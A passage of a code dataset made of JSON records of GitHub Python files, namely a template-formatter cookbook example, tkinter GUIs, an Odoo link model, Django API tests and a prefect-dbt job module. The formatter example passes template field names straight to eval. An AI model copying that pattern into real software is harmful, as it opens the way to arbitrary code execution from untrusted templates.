+{"seq_id":"34384548400","text":"import string\n\nclass TemplateFormatter(string.Formatter):\n def get_field(self, field_name, args, kwargs):\n if field_name.startswith(\"$\"):\n code = field_name[1:]\n val = eval(code, {}, dict(kwargs))\n return val, field_name\n else:\n return super(TemplateFormatter, self).get_field(field_name, args, kwargs)\nmessages = ['Message 1', 'Message 2']\n\ntmpl = TemplateFormatter()\ntxt = tmpl.format(\"Hello {name}, \"\n \"You have {$len(messages)} message{$len(messages) and 's'}:\\n{$'\\\\n'.join(messages)}\",\n name='Alessandro', messages=messages)\nprint(txt)\n","repo_name":"PacktPublishing/Modern-Python-Standard-Library-Cookbook","sub_path":"Chapter02/text_04.py","file_name":"text_04.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"16"}
+{"seq_id":"20800201828","text":"import tkinter\nimport CustomerLoginWindow\nimport colorfile\nfrom databases import StockDatabase, CustomerDatabase, StaffDatabase, BasketDatabase, OrderDatabase\nfrom staffViews.stockManager import StockManager\nfrom staffViews.staffManager import StaffManager\nfrom staffViews.custManager import CustomerManager\nfrom staffViews.orderManager import OrderManager\n\nclass StaffPortal:\n def __init__(self, db:StockDatabase.StockDatabase,customerdb:CustomerDatabase.CustomerDB,staffdb:StaffDatabase.StaffDB, bdb:BasketDatabase.BasketDatabase, odb:OrderDatabase.OrderDatabase, closeFn):\n #Public vars\n self.db = db\n self.customerdb = customerdb\n self.staffdb = staffdb\n self.basketdb = bdb\n self.orderdb = odb\n self.closeFn = closeFn\n #Window Builder\n self.root = tkinter.Toplevel()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.HandleClose) #Captures the close event to close it properly\n self.root.title(\"BuildrightDB\")\n self.root.geometry(\"900x450\")\n self.DrawWidgets()\n\n self.root.mainloop()\n\n def DrawWidgets(self):\n #Header Frame\n self.headerFrame = tkinter.Frame(self.root, bg=colorfile.topbarcolor)\n self.headerFrame.place(x=0,y=0,width=900,height=64)\n self.titleLabel = tkinter.Label(self.headerFrame, text=\"Staff Portal\", font=\"default 32 normal\", anchor=\"w\", bg=colorfile.topbarcolor)\n self.titleLabel.place(x=8,y=8,width=400,height=48)\n\n #Stock Management\n self.stockViewButton = tkinter.Button(self.root, text=\"Stock Management\", command=lambda:self.ViewStock())\n self.stockViewButton.place(x=8,y=100,width=438,height=125)\n\n #Staff Management\n self.staffViewButton = tkinter.Button(self.root, text=\"Staff Management\", command=lambda:self.ViewStaff())\n self.staffViewButton.place(x=454,y=100,width=438,height=125)\n\n #Customer Management\n self.customerViewButton = tkinter.Button(self.root, text=\"Customer Management\", command=lambda:self.ViewCustomer())\n self.customerViewButton.place(x=8,y=233,width=438,height=125)\n\n #Order Management\n self.orderViewButton = tkinter.Button(self.root, text=\"Order Management\", command=lambda:self.ViewOrder())\n self.orderViewButton.place(x=454,y=233,width=438,height=125)\n\n def HandleClose(self):\n #print(\"Closing!\")\n self.root.quit()\n self.root.destroy()\n self.closeFn()\n\n def ViewStock(self):\n stockmm = StockManager.StockManager(self.db)\n\n def ViewStaff(self):\n staffm = StaffManager.StaffManager(self.staffdb)\n \n def ViewCustomer(self):\n cman = CustomerManager.CustomerManager(self.customerdb)\n\n def ViewOrder(self):\n oman = OrderManager.OrderManager(self.orderdb, self.customerdb, self.db)","repo_name":"jasonthehuman05/CompSciCoursework","sub_path":"CourseworkMainProgramming/StaffPortal.py","file_name":"StaffPortal.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43681037952","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass LinkType(models.Model):\n \"\"\"Type of a link.\n \"\"\"\n _name = 'anytracker.link.type'\n _description = \"Link type\"\n _order = 'name'\n\n name = fields.Char(\n _(\"name\"),\n size=64,\n required=True,\n translate=True)\n description = fields.Text(\n _('Description'),\n translate=True)\n\n\nclass Link(models.Model):\n \"\"\"The link is used to link 2 tickets.\n For example it is useful to link use case ticket with few technical ticket\n A ticket can be present in several links.\n \"\"\"\n _name = 'anytracker.link'\n _description = \"Link between two tickets\"\n\n @api.one\n @api.depends('ticket_two', 'ticket_one')\n @api.onchange('ticket_two', 'ticket_one')\n def _data_tickets(self):\n # This function is used for ticket view\n # to display the list of active ticket links\n # In the link, the active ticket can be ticket_one or ticket_two,\n # the goal is to display the ticket is not active ticket\n\n for link in self:\n if self.env.context.get('active_id'):\n active_id = self.env.context['active_id']\n if link.ticket_one:\n if link.ticket_one.id != active_id:\n link.name = link.ticket_one.name\n link.number = link.ticket_one.number\n link.stage = link.ticket_one.stage_id.name\n link.progress = link.ticket_one.progress\n\n if link.ticket_two:\n if link.ticket_two.id != active_id:\n link.name = link.ticket_two.name\n link.number = link.ticket_two.number\n link.stage = link.ticket_two.stage_id.name\n link.progress = link.ticket_two.progress\n else:\n link.name = False\n link.number = False\n link.stage = False\n link.progress = False\n\n ticket_one = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket one',\n required=True,\n ondelete='cascade')\n ticket_two = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket two',\n required=True,\n ondelete='cascade')\n\n linktype_id = fields.Many2one(\n 'anytracker.link.type',\n 'Type Link',\n required=True,\n ondelete='cascade')\n name = fields.Char(compute='_data_tickets', string=\"\")\n number = fields.Char(compute='_data_tickets', string=\"\")\n progress = fields.Float(compute='_data_tickets', string=\"\")\n stage = fields.Char(compute='_data_tickets', string=\"\")\n\n @api.multi\n def name_get(self):\n \"\"\" set a displaying to better represent link between two tickets \"\"\"\n\n result = []\n\n for link in self:\n diaplay_value = \"{} <-> {}\".format(\n link.ticket_one.number, link.ticket_two.number)\n result.append((link.id, diaplay_value))\n\n return result\n\n def return_action_ticket(self):\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n 'name': 'Ticket',\n 'res_model': 'anytracker.ticket',\n 'view_type': 'tree',\n 'view_mode': 'tree',\n 'target': 'current',\n 'nodestroy': True,\n }\n\n @api.multi\n def action_delete_link(self):\n # FIXME - Is there no verification to be done before deleting a link?\n self.unlink()\n return self.return_action_ticket()\n\n @api.multi\n def action_open_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n return {\n 'name': self.name,\n 'res_model': 'anytracker.link',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'context': {},\n 'view_mode': 'form',\n 'view_type': 'form',\n 'target': 'new',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n\nclass Ticket(models.Model):\n \"\"\" Add links\n \"\"\"\n _inherit = 'anytracker.ticket'\n\n @api.one\n def _getAllLink(self):\n LINK_MODEL = self.env['anytracker.link']\n for ticket in self:\n ticket.all_links = LINK_MODEL.search(\n ['|', ('ticket_two', '=', ticket.id),\n ('ticket_one', '=', ticket.id)])\n\n @api.multi\n def action_add_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n # template = self.env.ref('account.email_template_edi_invoice', False)\n return {\n 'name': \"add new link\",\n 'res_model': 'anytracker.link',\n # 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': {'default_ticket_one': self.id},\n # 'view_id': self.env.ref('view_prod_order_form'),\n 'target': 'new', # 'target': 'current',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n link_ids = fields.One2many(\n 'anytracker.link',\n 'ticket_one',\n 'Links',\n copy=True,\n help=\"The tickets linked to this tickets\")\n all_links = fields.One2many(\n 'anytracker.link',\n string=\"links\",\n compute='_getAllLink')\n","repo_name":"anybox/anytracker","sub_path":"anytracker/link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40350522053","text":"\"\"\"\nThis is a test\n\"\"\"\n#-----------------------------------------------------------------------\nfrom tkinter import *\n#-----------------------------------------------------------------------\n\n# Window Declaration\nroot = Tk(className=\"Ben's Window\")\n\n# Button Functionality\ndef myClick():\n myClick = Label(root, text=\"!!!Poop Alert!!!\").pack()\n searchBox = Label(root, text=\"Input: \" + search.get()).pack()\n\n\n# Labels\nmyLabel = Label(root, text=\"Hello Ben!\")\nmyLabel2 = Label(root, text=\"I hope you are having a wonderful day!\")\n# Buttons\nmyButton = Button(root, text=\"Do Not Press!\", padx=100, pady=100, command=myClick, fg=\"white\", bg=\"red\")\nsearch = Entry(root, fg=\"black\", bg=\"light blue\", width=25, borderwidth=5)\n\n# Pack it in\nmyLabel.pack()\nmyLabel2.pack()\nsearch.pack()\nsearch.insert(0, \"Fuck you!\")\nmyButton.pack()\n\nroot.mainloop()","repo_name":"BenRosentha1/Beginner-Projects","sub_path":"GUI Shit/guiTest.py","file_name":"guiTest.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39232229680","text":"\"\"\"Tests for Ingredients API.\"\"\"\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient URL\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='test@example.com', password='testpass123'):\n \"\"\"Create and return new user.\"\"\"\n return get_user_model().objects.create(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Tests unauthenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Tests authenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n # Create user and login\n self.user = create_user()\n self.client.force_authenticate(self.user)\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n # Create dummy data\n Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=self.user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Check response\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db for data and order by name\n ingredients = Ingredient.objects.all().order_by('-name')\n # Serialize to simulate API\n serialized = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(ingredients.count(), 2)\n self.assertEqual(res.data, serialized.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Tests list of ingredients is limited to authenticated user\"\"\"\n # Create secondary user\n new_user = create_user(email='test2@example.com',\n password='testpass231')\n # Create ingredients\n ingredient = Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=new_user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Assert response is OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db\n ingredients = Ingredient.objects.filter(user=self.user)\n # serialize data\n serialized = IngredientSerializer(ingredients, many=True)\n # Assert received same as db\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serialized.data)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Prepare for API call\n payload = {\n 'name': 'Breadcrumbs'\n }\n url = detail_url(ingredient.id)\n # Send PATCH request\n res = self.client.patch(url, payload)\n\n # Assert response OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Refresh ingredient details from db\n ingredient.refresh_from_db()\n # Assert name has been changed\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Build url for API call\n url = detail_url(ingredient.id)\n # Send DELETE request\n res = self.client.delete(url)\n\n # Assert response code OK\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n # Assert that no ingredient exists\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n","repo_name":"dmawardi/recipe-app-api","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42838389886","text":"\"\"\"Module containing tasks and flows for interacting with dbt Cloud jobs\"\"\"\nimport asyncio\nimport shlex\nimport time\nfrom json import JSONDecodeError\nfrom typing import Any, Awaitable, Callable, Dict, List, Optional, Union\n\nfrom httpx import HTTPStatusError\nfrom prefect import flow, get_run_logger, task\nfrom prefect.blocks.abstract import JobBlock, JobRun\nfrom prefect.context import FlowRunContext\nfrom prefect.utilities.asyncutils import sync_compatible\nfrom pydantic import VERSION as PYDANTIC_VERSION\n\nif PYDANTIC_VERSION.startswith(\"2.\"):\n from pydantic.v1 import Field\nelse:\n from pydantic import Field\n\nfrom typing_extensions import Literal\n\nfrom prefect_dbt.cloud.credentials import DbtCloudCredentials\nfrom prefect_dbt.cloud.exceptions import (\n DbtCloudGetJobFailed,\n DbtCloudGetRunArtifactFailed,\n DbtCloudGetRunFailed,\n DbtCloudJobRunCancelled,\n DbtCloudJobRunFailed,\n DbtCloudJobRunIncomplete,\n DbtCloudJobRunTimedOut,\n DbtCloudJobRunTriggerFailed,\n DbtCloudListRunArtifactsFailed,\n)\nfrom prefect_dbt.cloud.models import TriggerJobRunOptions\nfrom prefect_dbt.cloud.runs import (\n DbtCloudJobRunStatus,\n get_dbt_cloud_run_artifact,\n get_dbt_cloud_run_info,\n list_dbt_cloud_run_artifacts,\n wait_for_dbt_cloud_job_run,\n)\nfrom prefect_dbt.cloud.utils import extract_user_message\n\nEXE_COMMANDS = (\"build\", \"run\", \"test\", \"seed\", \"snapshot\")\n\n\n@task(\n name=\"Get dbt Cloud job details\",\n description=\"Retrieves details of a dbt Cloud job \"\n \"for the job with the given job_id.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def get_dbt_cloud_job_info(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n order_by: Optional[str] = None,\n) -> Dict:\n \"\"\"\n A task to retrieve information about a dbt Cloud job.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to get.\n\n Returns:\n The job data returned by the dbt Cloud administrative API.\n\n Example:\n Get status of a dbt Cloud job:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import get_job\n\n @flow\n def get_job_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n return get_job(\n dbt_cloud_credentials=credentials,\n job_id=42\n )\n\n get_job_flow()\n ```\n \"\"\" # noqa\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n\n@task(\n name=\"Trigger dbt Cloud job run\",\n description=\"Triggers a dbt Cloud job run for the job \"\n \"with the given job_id and optional overrides.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def trigger_dbt_cloud_job_run(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n options: Optional[TriggerJobRunOptions] = None,\n) -> Dict:\n \"\"\"\n A task to trigger a dbt Cloud job run.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n options: An optional TriggerJobRunOptions instance to specify overrides\n for the triggered job run.\n\n Returns:\n The run data returned from the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job run:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(dbt_cloud_credentials=credentials, job_id=1)\n\n\n trigger_dbt_cloud_job_run_flow()\n ```\n\n Trigger a dbt Cloud job run with overrides:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=credentials,\n job_id=1,\n options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail-fast\",\n ],\n ),\n )\n\n\n trigger_dbt_cloud_job_run()\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n logger.info(f\"Triggering run for job with ID {job_id}\")\n\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(job_id=job_id, options=options)\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n\n if \"project_id\" in run_data and \"id\" in run_data:\n logger.info(\n f\"Run successfully triggered for job with ID {job_id}. \"\n \"You can view the status of this run at \"\n f\"https://{dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{dbt_cloud_credentials.account_id}/projects/{run_data['project_id']}/\"\n f\"runs/{run_data['id']}/\"\n )\n\n return run_data\n\n\n@task(\n name=\"Get dbt Cloud job run ID\",\n description=\"Extracts the run ID from a trigger job run API response\",\n)\ndef get_run_id(obj: Dict):\n \"\"\"\n Task that extracts the run ID from a trigger job run API response,\n\n This task is mainly used to maintain dependency tracking between the\n `trigger_dbt_cloud_job_run` task and downstream tasks/flows that use the run ID.\n\n Args:\n obj: The JSON body from the trigger job run response.\n\n Example:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run, get_run_id\n\n\n @flow\n def trigger_run_and_get_id():\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n )\n\n triggered_run_data = trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = get_run_id.submit(triggered_run_data)\n return run_id\n\n trigger_run_and_get_id()\n ```\n \"\"\"\n id = obj.get(\"id\")\n if id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n return id\n\n\n@flow(\n name=\"Trigger dbt Cloud job run and wait for completion\",\n description=\"Triggers a dbt Cloud job run and waits for the\"\n \"triggered run to complete.\",\n)\nasync def trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n retry_filtered_models_attempts: int = 3,\n) -> Dict:\n \"\"\"\n Flow that triggers a job run and waits for the triggered run to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n retry_filtered_models_attempts: Number of times to retry models selected by `retry_status_filters`.\n\n Raises:\n DbtCloudJobRunCancelled: The triggered dbt Cloud job run was cancelled.\n DbtCloudJobRunFailed: The triggered dbt Cloud job run failed.\n RuntimeError: The triggered dbt Cloud job run ended in an unexpected state.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job and wait for completion as a stand alone flow:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n )\n ```\n\n Trigger a dbt Cloud job and wait for completion as a sub-flow:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n @flow\n def my_flow():\n ...\n run_result = trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n ...\n\n my_flow()\n ```\n\n Trigger a dbt Cloud job with overrides:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1,\n trigger_job_run_options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail fast\",\n ],\n ),\n )\n )\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n triggered_run_data_future = await trigger_dbt_cloud_job_run.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = (await triggered_run_data_future.result()).get(\"id\")\n if run_id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n\n final_run_status, run_data = await wait_for_dbt_cloud_job_run(\n run_id=run_id,\n dbt_cloud_credentials=dbt_cloud_credentials,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n\n if final_run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n list_run_artifacts_future = await list_dbt_cloud_run_artifacts.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n )\n run_data[\"artifact_paths\"] = await list_run_artifacts_future.result()\n except DbtCloudListRunArtifactsFailed as ex:\n logger.warning(\n \"Unable to retrieve artifacts for job run with ID %s. Reason: %s\",\n run_id,\n ex,\n )\n logger.info(\n \"dbt Cloud job run with ID %s completed successfully!\",\n run_id,\n )\n return run_data\n elif final_run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(\n f\"Triggered job run with ID {run_id} was cancelled.\"\n )\n elif final_run_status == DbtCloudJobRunStatus.FAILED:\n while retry_filtered_models_attempts > 0:\n logger.info(\n f\"Retrying job run with ID: {run_id} \"\n f\"{retry_filtered_models_attempts} more times\"\n )\n try:\n retry_filtered_models_attempts -= 1\n run_data = await (\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n trigger_job_run_options=trigger_job_run_options,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n )\n return run_data\n except Exception:\n pass\n else:\n raise DbtCloudJobRunFailed(f\"Triggered job run with ID: {run_id} failed.\")\n else:\n raise RuntimeError(\n f\"Triggered job run with ID: {run_id} ended with unexpected\"\n f\"status {final_run_status.value}.\"\n )\n\n\nasync def _build_trigger_job_run_options(\n dbt_cloud_credentials: DbtCloudCredentials,\n trigger_job_run_options: TriggerJobRunOptions,\n run_id: str,\n run_info: Dict[str, Any],\n job_info: Dict[str, Any],\n):\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job_info.get(\"generate_docs\", False)\n generate_sources = job_info.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run_info[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (is_exe_command and is_skipped):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact_future = await get_dbt_cloud_run_artifact.with_options(\n retries=0, retry_delay_seconds=0\n ).submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n path=\"run_results.json\",\n step=run_step[\"index\"],\n )\n run_artifact = await run_artifact_future.result()\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes for those run commands\n run_results = run_artifact[\"results\"]\n # select nodes that were not successful\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(\n select_arg\n )\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\"\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(\n exe_command\n )\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n steps_override.append(modified_command)\n\n if trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = trigger_job_run_options.copy()\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n\n@flow(\n name=\"Retry subset of dbt Cloud job run and wait for completion\",\n description=(\n \"Retries a subset of dbt Cloud job run, filtered by select statuses, \"\n \"and waits for the triggered retry to complete.\"\n ),\n)\nasync def retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n run_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n) -> Dict:\n \"\"\"\n Flow that retrys a subset of dbt Cloud job run, filtered by select statuses,\n and waits for the triggered retry to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n run_id: The ID of the job run to retry.\n\n Raises:\n ValueError: If `trigger_job_run_options.steps_override` is set by the user.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Retry a subset of models in a dbt Cloud job run and wait for completion:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import retry_dbt_cloud_job_run_subset_and_wait_for_completion\n\n @flow\n def retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow():\n credentials = DbtCloudCredentials.load(\"MY_BLOCK_NAME\")\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=credentials,\n run_id=88640123,\n )\n\n 